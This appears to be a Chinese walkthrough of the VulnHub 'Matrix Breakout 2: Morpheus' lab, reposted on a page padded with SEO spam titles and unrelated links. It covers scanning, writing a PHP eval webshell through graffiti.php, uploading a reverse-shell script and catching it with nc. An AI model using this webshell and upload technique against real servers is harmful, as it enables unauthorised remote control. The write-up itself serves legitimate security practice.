当前位置: 首页 > wzjs >正文

做钓鱼网站教程今天头条新闻100条

做钓鱼网站教程,今天头条新闻100条,网站 建设 汇报,衡阳做网站建设的公司【此练习仅做到反弹shell】 1.靶机下载地址 https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova 2. 打开靶机,kali使用nmap扫描同C段的主机 找到靶机ip 确保靶机和kali网卡均为NAT模式 先查看kali的ip nmap 192.168.182.1/24 …

【此练习仅做到反弹shell】

1.靶机下载地址

https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

2. 打开靶机,kali使用nmap扫描同C段的主机  找到靶机ip

确保靶机和kali网卡均为NAT模式

先查看kali的ip

nmap 192.168.182.1/24       排除物理机、网关、kali等,可得出靶机ip为  192.168.182.162、

以及开启端口:22 ssh、80 http 、81  hosts2-ns

3.  直接通过ip访问页面   发现无法ssh,以及关键词Trinity

4.  kali的dirb扫描敏感目录

发现 /robots.txt文件、

以及js脚本文件: /javascript/jquery        、  /javascript/jquery/jquery

5. 访问多个目录的网址

ip/robots.txt  无任何信息

 /javascript/jquery  无权限访问

/javascript/jquery/jquery      页面源代码

无有效结果,换其他方式扫描目录

6.  使用gobuster再次扫描

输入:gobuster dir -u http://192.168.182.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

注意:

发现无gobuster ,kali使用apt命令进行安装:apt install gobuster。

如果无法找到软件包,请先更新apt命令:apt update。

再安装gobuster即可。

安装完成,再次执行开始的那条命令。

扫描结果,发现 /robots.txt   、 /graffiti.txt   、   /graffiti.php  三个可用 文件

7.对 /graffiti.txt   、   /graffiti.php 进行访问

在 graffiti.php 页面发现输入框

8.在输入框输入123456,点击Post,发现页面显示出该内容

9. 尝试输入一句话木马

输入:<?php @eval($_POST[cmd]);?>

抓包,发现将数据提交到 graffiti.txt文件中

将message值改为一句话木马,目标文件改为shell.php文件。发行,关闭拦截。

10. 访问shell.php文件,蚁剑进行连接

11. 找到kali自带的反弹shell文件,复制内容到物理机保存为1.php

kali:

cd /usr/share/webshells/

cd php

cat php-reverse-shell.php

12. 修改ip和端口

13. 将 1.php文件通过蚁剑上传到靶机中

14.kali的nc监听6654端口,浏览器访问上传的1.php,反弹shell

监听返回了shell,输入whoami验证,成功。

此练习仅做到反弹shell。

练习结束,反弹shell可通过kali的自带反弹shell文件,上传文件并访问获取shell。

对大家能有些许帮助最好,没有的话请见谅。

再见。。。

                                                                                           ----------------2025/3/19  21:52

http://www.dtcms.com/wzjs/161299.html

相关文章:

  • 有哪些做公司网站如何进行关键词优化工作
  • 网站建设w亿玛酷1流量订制渠道推广
  • 石家庄做手机网站建设泽成杭州seo网站推广排名
  • 做鞋子出口需要作网站吗适合企业员工培训的课程
  • 电商平台收费标准seo查询工具有哪些
  • 机械网站建设注意什么搜索引擎营销的手段包括
  • 做网站具备的条件小红书关键词搜索量查询
  • 网站开发代理合同网站设计公司怎么样
  • 全面的vi设计公司品牌seo培训
  • wordpress建设中seo岗位工作内容
  • 北京做网站的网络公司百度第三季度财报2022
  • 网站如何做百度才会收录长沙网站公司品牌
  • 品牌定位 品牌上海抖音seo公司
  • 上海网站建设定制公微博关键词排名优化
  • 湖南长沙天气seo排名点击 seo查询
  • 编程 朋友 做网站百度竞价点击价格
  • 合肥市建设工程造价信息网站推广哪个网站好
  • 文山微网站建设站长工具免费
  • 武汉关键词排名提升搜索引擎优化趋势
  • 网页游戏网站开发人工智能培训机构排名
  • 切实加强政府门户网站建设网络seo是什么意思
  • 手机app开发网站模板资源优化网站排名
  • 长春精神文明建设网站百度商业账号登录
  • 冀州网站制作公众号关键词排名优化
  • 大型网站 div百度网盘app官网下载
  • 创个网站怎么弄全网搜索
  • 人才招聘网站建设方案深圳推广不动产可视化查询
  • 商城类网站如何众筹品牌推广经典案例
  • 天津市建设工程交易管理网站东营网站建设制作
  • wordpress 做大型网站吗google play官网